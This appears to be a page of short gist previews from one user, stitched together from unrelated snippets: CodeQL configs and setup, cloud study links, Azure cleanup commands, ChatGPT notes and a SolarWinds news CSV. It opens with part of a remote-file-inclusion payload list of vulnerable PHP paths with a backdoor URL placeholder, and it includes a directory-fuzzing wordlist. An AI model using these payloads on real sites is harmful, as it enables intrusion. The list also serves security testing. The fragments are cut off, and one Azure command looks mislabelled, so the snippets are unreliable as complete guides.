ruevaughn

# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
# Change XXpathXX to the path of your backdoor.  Note that you may need to 
# try it against every directory on the target and because of how this was
# culled you may need to add a question mark to your own XXpathXX URL:
# Eg: XXpathXX => http://www.example.com/hax.txt?
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX?
/123flashchat.php?e107path=XXpathXX
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX
/22_ultimate/templates/header.php?mainpath=XXpathXX
/22_ultimate/templates/header.php?mainpath=XXpathXX?

ruevaughn

name: "My CodeQL config"

disable-default-queries: true

languages: java

queries:
  - name: Extended Security
    uses: security-extended
  - name: Security and Quality

ruevaughn

#!/bin/bash

# Check for latest release: https://github.com/github/codeql-cli-binaries/releases
_version='v2.4.1'
_arch='osx'
_zip_url="https://github.com/github/codeql-cli-binaries/releases/download/${_version}/codeql-${_arch}64.zip"
_dir='codeql-home'
_cores=2

pushd "${HOME}" || exit

ruevaughn

For GCP Associate Cloud Engineer:
A Cloud Guru:
https://acloud.guru/learn/gcp-certified-associate-cloud-engineer 

Linux Academy:
https://linuxacademy.com/cp/modules/view/id/238



For AWS Cloud Practioner: 

ruevaughn

CodeQL で遊んでみる

気になったからちょっと遊んでみる。OSI-approved License のコードならいいけど、そうじゃない場合はライセンス注意。

https://docs.github.com/en/code-security/codeql-cli/using-the-codeql-cli/about-the-codeql-cli#about-the-github-codeql-license

AUR に https://aur.archlinux.org/packages/codeql があるからこれを使う。

% paru -S codeql

ruevaughn

Public IPs

az resource delete --ids $(az network public-ip list --query '[?ipAddress==`null`].[id]' -o tsv)

Network Security Groups

az resource delete --ids $(az network public-ip list --query '[?ipAddress==`null`].[id]' -o tsv)

Network Interfaces

ruevaughn

../wiki/ImageDatabaseSummary.md
./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
/..
/...
/../
/.DS_Store
/.codepushrelease
/0-.
/10000000
/3-

ruevaughn

ChatGPT Resources

Context

ChatGPT appeared like an explosion on all my social media timelines in early December 2022. While I keep up with machine learning as an industry, I wasn't focused so much on this particular corner, and all the screenshots seemed like they came out of nowhere. What was this model? How did the chat prompting work? What was the context of OpenAI doing this work and collecting my prompts for training data?

I decided to do a quick investigation. Here's all the information I've found so far. I'm aggregating and synthesizing it as I go, so it's currently changing pretty frequently.

Model Architecture

ruevaughn

ruevaughn

url,tweets
https://www.nytimes.com/2020/12/16/opinion/fireeye-solarwinds-russia-hack.html,5502
https://web.archive.org/web/20201213230906/https://www.solarwinds.com/company/customers,3460
https://www.thegatewaypundit.com/2020/12/breaking-fbi-texas-rangers-us-marshals-raid-solarwinds-hq-austin/,2372
https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html,1559
https://www.geekwire.com/2020/microsoft-unleashes-death-star-solarwinds-hackers-extraordinary-response-breach/,1317
https://www.reuters.com/article/us-global-cyber-microsoft-idUSKBN28R3BY,955
https://www.cisa.gov/news/2020/12/13/cisa-issues-emergency-directive-mitigate-compromise-solarwinds-orion-network,805
https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/,706
https://www.reuters.com/article/us-usa-solarwinds-cyber-idUSKBN28N0Y7,661